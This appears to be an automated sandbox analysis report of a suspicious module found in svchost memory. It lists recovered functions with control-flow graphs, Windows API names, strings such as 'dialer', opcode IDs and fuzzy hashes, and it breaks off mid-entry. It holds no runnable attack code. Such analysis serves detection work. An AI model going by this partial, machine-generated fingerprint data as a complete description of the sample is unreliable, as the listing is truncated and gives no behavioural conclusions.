                                                                                                                                                                                            Function 0000023D0748A544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 309 23d0748a544-23d0748a5ac call 23d0748b414 312 23d0748a5b2-23d0748a5b5 309->312 313 23d0748aa13-23d0748aa1b call 23d0748c748 309->313 312->313 314 23d0748a5bb-23d0748a5c1 312->314 316 23d0748a5c7-23d0748a5cb 314->316 317 23d0748a690-23d0748a6a2 314->317 316->317 321 23d0748a5d1-23d0748a5dc 316->321 319 23d0748a6a8-23d0748a6ac 317->319 320 23d0748a963-23d0748a967 317->320 319->320 324 23d0748a6b2-23d0748a6bd 319->324 322 23d0748a969-23d0748a970 320->322 323 23d0748a9a0-23d0748a9aa call 23d07489634 320->323 321->317 325 23d0748a5e2-23d0748a5e7 321->325 322->313 326 23d0748a976-23d0748a99b call 23d0748aa1c 322->326 323->313 335 23d0748a9ac-23d0748a9cb call 23d07487940 323->335 324->320 328 23d0748a6c3-23d0748a6ca 324->328 325->317 329 23d0748a5ed-23d0748a5f7 call 23d07489634 325->329 326->323 332 23d0748a6d0-23d0748a707 call 23d07489a10 328->332 333 23d0748a894-23d0748a8a0 328->333 329->335 339 23d0748a5fd-23d0748a628 call 23d07489634 * 2 call 23d07489d24 329->339 332->333 344 23d0748a70d-23d0748a715 332->344 333->323 336 23d0748a8a6-23d0748a8aa 333->336 341 23d0748a8ba-23d0748a8c2 336->341 342 23d0748a8ac-23d0748a8b8 call 23d07489ce4 336->342 377 23d0748a648-23d0748a652 call 23d07489634 339->377 378 23d0748a62a-23d0748a62e 339->378 341->323 348 23d0748a8c8-23d0748a8d5 call 23d074898b4 341->348 342->341 357 23d0748a8db-23d0748a8e3 342->357 350 23d0748a719-23d0748a74b 344->350 348->323 348->357 354 23d0748a887-23d0748a88e 350->354 355 23d0748a751-23d0748a75c 350->355 354->333 354->350 355->354 358 23d0748a762-23d0748a77b 355->358 359 23d0748a9f6-23d0748aa12 call 23d07489634 * 2 call 23d0748c6a8 357->359 360 23d0748a8e9-23d0748a8ed 357->360 362 23d0748a781-23d0748a7c6 call 23d07489cf8 * 2 358->362 363 23d0748a874-23d0748a879 358->363 359->313 364 23d0748a8ef-23d0748a8fe call 23d07489ce4 360->364 365 23d0748a900 360->365 390 23d0748a7c8-23d0748a7ee call 23d07489cf8 call 23d0748ac38 362->390 391 23d0748a804-23d0748a80a 362->391 369 23d0748a884 363->369 373 23d0748a903-23d0748a90d call 23d0748b4ac 364->373 365->373 369->354 373->323 388 23d0748a913-23d0748a961 call 23d07489944 call 23d07489b50 373->388 377->317 394 23d0748a654-23d0748a674 call 23d07489634 * 2 call 23d0748b4ac 377->394 378->377 382 23d0748a630-23d0748a63b 378->382 382->377 387 23d0748a63d-23d0748a642 382->387 387->313 387->377 388->323 410 23d0748a815-23d0748a872 call 23d0748a470 390->410 411 23d0748a7f0-23d0748a802 390->411 395 23d0748a87b 391->395 396 23d0748a80c-23d0748a810 391->396 415 23d0748a676-23d0748a680 call 23d0748b59c 394->415 416 23d0748a68b 394->416 400 23d0748a880 395->400 396->362 400->369 410->400 411->390 411->391 419 23d0748a686-23d0748a9ef call 23d074892ac call 23d0748aff4 call 23d074894a0 415->419 420 23d0748a9f0-23d0748a9f5 call 23d0748c6a8 415->420 416->317 419->420 420->359
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000007.00000002.3901166341.0000023D07480000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000023D07480000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_23d07480000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                            • String ID: csm$csm$csm
                                                                                                                                                                                            • API String ID: 849930591-393685449
                                                                                                                                                                                            • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                                                                                                                                            • Instruction ID: 536d8d46a720bdb3e19783c50ae425961c44f96f11ecf8848f759341d2f5f997
                                                                                                                                                                                            • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                                                                                                                                            • Instruction Fuzzy Hash: 47E19C72604B488AEBA8DF75E4883ED77A0F745B98F144116EEC95BB99CB7CD281C700
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0000023D0748F394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000007.00000002.3901166341.0000023D07480000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000023D07480000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_23d07480000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: AddressFreeLibraryProc
                                                                                                                                                                                            • String ID: api-ms-$ext-ms-
                                                                                                                                                                                            • API String ID: 3013587201-537541572
                                                                                                                                                                                            • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                                                                                                                                            • Instruction ID: 220a255937933b56b9b33ae8eb537578247286bed024edff2a48e62733fefc1a
                                                                                                                                                                                            • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                                                                                                                                            • Instruction Fuzzy Hash: AB41F422311A0491EB9EDB36B808BD92391F755FE0F194126DD9E8F794EF3CC6498310
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0000023D0748104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 460 23d0748104c-23d074810b9 RegQueryInfoKeyW 461 23d074811b5-23d074811d0 460->461 462 23d074810bf-23d074810c9 460->462 462->461 463 23d074810cf-23d0748111f RegEnumValueW 462->463 464 23d074811a5-23d074811af 463->464 465 23d07481125-23d0748112a 463->465 464->461 464->463 465->464 466 23d0748112c-23d07481135 465->466 467 23d07481147-23d0748114c 466->467 468 23d07481137 466->468 470 23d07481199-23d074811a3 467->470 471 23d0748114e-23d07481193 GetProcessHeap call 23d07496168 GetProcessHeap HeapFree 467->471 469 23d0748113b-23d0748113f 468->469 469->464 472 23d07481141-23d07481145 469->472 470->464 471->470 472->467 472->469
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000007.00000002.3901166341.0000023D07480000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000023D07480000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_23d07480000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                                                                                                                            • String ID: d
                                                                                                                                                                                            • API String ID: 3743429067-2564639436
                                                                                                                                                                                            • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                                                                                                                            • Instruction ID: 732e625de784bcb73f92f89d23bf3222a5a8d0c3f290398500a3e22b29098c09
                                                                                                                                                                                            • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                                                                                                                            • Instruction Fuzzy Hash: EC414F72214B88C6E7A4CF31E44879E77A1F389F98F44811ADA8A0BB58DF3CC585CB40
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0000023D0748D068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • FlsGetValue.KERNEL32(?,?,?,0000023D0748C7DE,?,?,?,?,?,?,?,?,0000023D0748CF9D,?,?,00000001), ref: 0000023D0748D087
                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,0000023D0748C7DE,?,?,?,?,?,?,?,?,0000023D0748CF9D,?,?,00000001), ref: 0000023D0748D0A6
                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,0000023D0748C7DE,?,?,?,?,?,?,?,?,0000023D0748CF9D,?,?,00000001), ref: 0000023D0748D0CE
                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,0000023D0748C7DE,?,?,?,?,?,?,?,?,0000023D0748CF9D,?,?,00000001), ref: 0000023D0748D0DF
                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,0000023D0748C7DE,?,?,?,?,?,?,?,?,0000023D0748CF9D,?,?,00000001), ref: 0000023D0748D0F0
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000007.00000002.3901166341.0000023D07480000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000023D07480000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_23d07480000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Value
                                                                                                                                                                                            • String ID: 1%$Y%
                                                                                                                                                                                            • API String ID: 3702945584-1395475152
                                                                                                                                                                                            • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                                                                                                                                            • Instruction ID: 96d216e8e13310d52ca263043bb664ae6074142d933491655c349e1519d69680
                                                                                                                                                                                            • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                                                                                                                                            • Instruction Fuzzy Hash: 85116320B0624C81FAEC6735755D3ED6151DF89FF4F245324D8B95E7DADE6CC6028A00
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0000023D07487510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 500 23d07487510-23d07487516 501 23d07487518-23d0748751b 500->501 502 23d07487551-23d0748755b 500->502 504 23d07487545-23d07487584 call 23d07487bc0 501->504 505 23d0748751d-23d07487520 501->505 503 23d07487678-23d0748768d 502->503 509 23d0748769c-23d074876b6 call 23d07487a54 503->509 510 23d0748768f 503->510 523 23d0748758a-23d0748759f call 23d07487a54 504->523 524 23d07487652 504->524 507 23d07487538 __scrt_dllmain_crt_thread_attach 505->507 508 23d07487522-23d07487525 505->508 512 23d0748753d-23d07487544 507->512 514 23d07487527-23d07487530 508->514 515 23d07487531-23d07487536 call 23d07487b04 508->515 521 23d074876b8-23d074876ed call 23d07487b7c call 23d07487a1c call 23d07487f18 call 23d07487d30 call 23d07487d54 call 23d07487bac 509->521 522 23d074876ef-23d07487720 call 23d07487d90 509->522 516 23d07487691-23d0748769b 510->516 515->512 521->516 532 23d07487731-23d07487737 522->532 533 23d07487722-23d07487728 522->533 535 23d074875a5-23d074875b6 call 23d07487ac4 523->535 536 23d0748766a-23d07487677 call 23d07487d90 523->536 527 23d07487654-23d07487669 524->527 538 23d07487739-23d07487743 532->538 539 23d0748777e-23d07487794 call 23d0748328c 532->539 533->532 537 23d0748772a-23d0748772c 533->537 553 23d07487607-23d07487611 call 23d07487d30 535->553 554 23d074875b8-23d074875dc call 23d07487edc call 23d07487a0c call 23d07487a38 call 23d0748b80c 535->554 536->503 543 23d0748781f-23d0748782c 537->543 544 23d07487745-23d0748774d 538->544 545 23d0748774f-23d0748775d call 23d07496380 538->545 556 23d07487796-23d07487798 539->556 557 23d074877cc-23d074877ce 539->557 550 23d07487763-23d07487778 call 23d07487510 544->550 545->550 567 23d07487815-23d0748781d 545->567 550->539 550->567 553->524 576 23d07487613-23d0748761f call 23d07487d80 553->576 554->553 603 23d074875de-23d074875e5 __scrt_dllmain_after_initialize_c 554->603 556->557 564 23d0748779a-23d074877bc call 23d0748328c call 23d07487678 556->564 565 23d074877d5-23d074877ea call 23d07487510 557->565 566 23d074877d0-23d074877d3 557->566 564->557 597 23d074877be-23d074877c6 call 23d07496380 564->597 565->567 585 23d074877ec-23d074877f6 565->585 566->565 566->567 567->543 587 23d07487645-23d07487650 576->587 588 23d07487621-23d0748762b call 23d07487c98 576->588 591 23d074877f8-23d074877ff 585->591 592 23d07487801-23d07487811 call 23d07496380 585->592 587->527 588->587 602 23d0748762d-23d0748763b 588->602 591->567 592->567 597->557 602->587 603->553 604 23d074875e7-23d07487604 call 23d0748b7c8 603->604 604->553
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000007.00000002.3901166341.0000023D07480000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000023D07480000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_23d07480000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 190073905-0
                                                                                                                                                                                            • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                                                                                                                            • Instruction ID: 3c3fe68667dff4fe80a272d234669d31d8cc619f6e09dd2980a6d8291b9e6246
                                                                                                                                                                                            • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                                                                                                                            • Instruction Fuzzy Hash: 8681D12060020986FBDEABB9B4693ED2690EB85FC0F344525DAC85F796EB7CCB45C700
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0000023D07489DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 607 23d07489dc4-23d07489e02 608 23d07489e08-23d07489e0b 607->608 609 23d07489ef3 607->609 610 23d07489ef5-23d07489f11 608->610 611 23d07489e11 608->611 609->610 612 23d07489e14 611->612 613 23d07489e1a-23d07489e29 612->613 614 23d07489eeb 612->614 615 23d07489e36-23d07489e55 LoadLibraryExW 613->615 616 23d07489e2b-23d07489e2e 613->616 614->609 619 23d07489e57-23d07489e60 call 23d07496080 615->619 620 23d07489ead-23d07489ec2 615->620 617 23d07489ecd-23d07489edc call 23d07496090 616->617 618 23d07489e34 616->618 617->614 627 23d07489ede-23d07489ee9 617->627 622 23d07489ea1-23d07489ea8 618->622 628 23d07489e8f-23d07489e99 619->628 629 23d07489e62-23d07489e77 call 23d0748c928 619->629 620->617 624 23d07489ec4-23d07489ec7 FreeLibrary 620->624 622->612 624->617 627->610 628->622 629->628 632 23d07489e79-23d07489e8d LoadLibraryExW 629->632 632->620 632->628
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000007.00000002.3901166341.0000023D07480000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000023D07480000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_23d07480000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                            • String ID: api-ms-
                                                                                                                                                                                            • API String ID: 2559590344-2084034818
                                                                                                                                                                                            • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                                                                                                                                            • Instruction ID: 79f85826cf6d51ad5503668325f3eb0820c79513d775df27631519396261a7e3
                                                                                                                                                                                            • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                                                                                                                                            • Instruction Fuzzy Hash: 7B31E321316A04E1EEAADB22B4487BC2794F748FA0F590526DDAD0F7D0EF3CD2858300
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0000023D07493DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000007.00000002.3901166341.0000023D07480000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000023D07480000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_23d07480000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                            • String ID: CONOUT$
                                                                                                                                                                                            • API String ID: 3230265001-3130406586
                                                                                                                                                                                            • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                                                                                                                                            • Instruction ID: 1caef314943c06c820d37def4def85c7bee3c22d55738b08747f0b803a2ac715
                                                                                                                                                                                            • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                                                                                                                                            • Instruction Fuzzy Hash: 80118F31710B40C6E7548F62F84871976A4F789FE4F044225EA9E8B7A4CFBCCA14C744
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0000023D07483790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000007.00000002.3901166341.0000023D07480000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000023D07480000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_23d07480000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                                                                                                                                            • String ID: wr
                                                                                                                                                                                            • API String ID: 1092925422-2678910430
                                                                                                                                                                                            • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                                                                                                                                            • Instruction ID: b0eca06a6f4c8b09d40d523fc51e2d0440dc9bb3a155f1570d80a708f3836b32
                                                                                                                                                                                            • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                                                                                                                                            • Instruction Fuzzy Hash: F111572A704B85C2EF989F25F4086AD62A0FB89F85F454029DEC90BBA4EF3DC605C704
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0000023D07485B30 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000007.00000002.3901166341.0000023D07480000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000023D07480000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_23d07480000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Thread$Current$Context
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1666949209-0
                                                                                                                                                                                            • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                                                                                                                                            • Instruction ID: 1c20424270809de4c7a4d27453aea059877fcba37ac5a0a130ee922f3b7d126c
                                                                                                                                                                                            • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                                                                                                                                            • Instruction Fuzzy Hash: AAD17876205B8882DB749B5AF49839EB7A0F388F84F144116EACD4BBA5DF3CC651CB00
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0000023D07482F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000007.00000002.3901166341.0000023D07480000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000023D07480000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_23d07480000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Heap$Process$AllocFree
                                                                                                                                                                                            • String ID: dialer
                                                                                                                                                                                            • API String ID: 756756679-3528709123
                                                                                                                                                                                            • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                                                                                                                                            • Instruction ID: 3e80cf93344f9922d6f9a33a9fe0b4d5177704c8d71f898fda4120b4878cee31
                                                                                                                                                                                            • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                                                                                                                                            • Instruction Fuzzy Hash: 71314B32701B5982EA99DF26F5487AD67A0FB44F84F084125DF884BB59EB7CCAA1D700
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0000023D074814A4 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 80memoryCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000007.00000002.3901166341.0000023D07480000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000023D07480000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_23d07480000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Heap$Process$Free
                                                                                                                                                                                            • String ID: C:\Windows\system32\svchost.exe
                                                                                                                                                                                            • API String ID: 3168794593-4180442734
                                                                                                                                                                                            • Opcode ID: 5f1dcf0d6982f64b78ee420bc41fcee6693c0fdf65c097574d0a291fc3cf39dd
                                                                                                                                                                                            • Instruction ID: 4d64a477369c4dc256e88d52594d81231af5bf76bd40be5b438022d7b9c461b5
                                                                                                                                                                                            • Opcode Fuzzy Hash: 5f1dcf0d6982f64b78ee420bc41fcee6693c0fdf65c097574d0a291fc3cf39dd
                                                                                                                                                                                            • Instruction Fuzzy Hash: 5131A2A7549AC4CBF359CF75F86A2493FA0F785F80F0A8015DAC40B25BEAACC6048702
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0000023D0748CFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000007.00000002.3901166341.0000023D07480000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000023D07480000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_23d07480000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Value$ErrorLast
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2506987500-0
                                                                                                                                                                                            • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                                                                                                                                            • Instruction ID: 7c01105b601beb6768a881e90ecabf47caa7506042673e5fc1417e79ccc341f5
                                                                                                                                                                                            • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                                                                                                                                            • Instruction Fuzzy Hash: 6D117220B0564C81FAECA735B55D3AD2152DB89FF4F140724E9B65F7D6DE6CC6028610
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0000023D0748199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000007.00000002.3901166341.0000023D07480000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000023D07480000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_23d07480000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 517849248-0
                                                                                                                                                                                            • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                                                                                                                                            • Instruction ID: 7229500157534b9a5568f036d6b372abd36ba2eea793dce436327e4c170db93b
                                                                                                                                                                                            • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                                                                                                                                            • Instruction Fuzzy Hash: AE012D21300A4482EB68DB62F45C75963A5F788FC4F494036DE995B755DF7CC64AC740
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0000023D074836C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000007.00000002.3901166341.0000023D07480000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000023D07480000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_23d07480000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 449555515-0
                                                                                                                                                                                            • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                                                                                                                                            • Instruction ID: 6dbb7f17221f21450fd4519921902a42b965d206acd2aa5d5387acdc063c68c2
                                                                                                                                                                                            • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                                                                                                                                            • Instruction Fuzzy Hash: EB012565612B44C2EB689B32F84D75A63A0FB89F86F044429CE890B765EFBDC208C701
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0000023D07489005 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 135COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000007.00000002.3901166341.0000023D07480000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000023D07480000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_23d07480000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                            • String ID: csm$f
                                                                                                                                                                                            • API String ID: 2395640692-629598281
                                                                                                                                                                                            • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                                                                                                                                            • Instruction ID: 4ec86ffcffa523f17305f7ad60e8d21f77aa71240808d36eeb0139ce66d0f1fb
                                                                                                                                                                                            • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
